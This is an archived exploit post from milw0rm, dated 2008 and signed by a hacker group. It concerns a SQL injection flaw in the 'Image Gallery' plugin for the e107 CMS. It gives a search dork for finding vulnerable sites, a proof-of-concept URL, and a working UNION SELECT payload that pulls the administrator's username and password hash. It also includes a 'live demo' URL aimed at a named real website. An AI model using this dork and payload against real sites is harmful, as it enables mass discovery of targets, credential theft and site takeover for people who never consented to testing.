36 lines
No EOL
1.1 KiB
Text
36 lines
No EOL
1.1 KiB
Text
####################################################
|
|
e107 Plugin Akira Powered's "Image Gallery" Remote SQL-injetion Vulnerability
|
|
####################################################
|
|
|
|
#####################################
|
|
Author: boom3rang
|
|
Site: www.khg-crew.ws
|
|
Greetz: KHG & H!tm@N & chs & redc00de & proxy-ki11er
|
|
Site: www.khg-crew.ws
|
|
#####################################
|
|
|
|
|
|
- Download Plugin: http://www.akirapowered.org/download.php?view.73
|
|
|
|
- Dork:
|
|
inurl:image_gallery.php?page=image-detail
|
|
|
|
- POC:
|
|
http://www.site.com/e107_Path/image_gallery/image_gallery.php?page=image-detail&album=1&image=[exploit]
|
|
|
|
- Exploit:
|
|
-9999+UNION+SELECT+concat_ws(char(58),user_name,user_password)KHG+from+e107_user+where+user_id=1--
|
|
|
|
- Live demo:
|
|
http://www.ifitbleeds.net/e107_plugins/image_gallery/image_gallery.php?page=image-detail&album=1&image=-9999+UNION+SELECT+concat_ws(char(58),user_name,user_password)KHG+from+e107_user+where+user_id=1--
|
|
|
|
|
|
|
|
#########################################
|
|
- Kosova Hackers Group
|
|
- United States of Albania
|
|
- Proud to be Albanian
|
|
- Proud to be Muslim
|
|
#########################################
|
|
|
|
# milw0rm.com [2008-09-21] |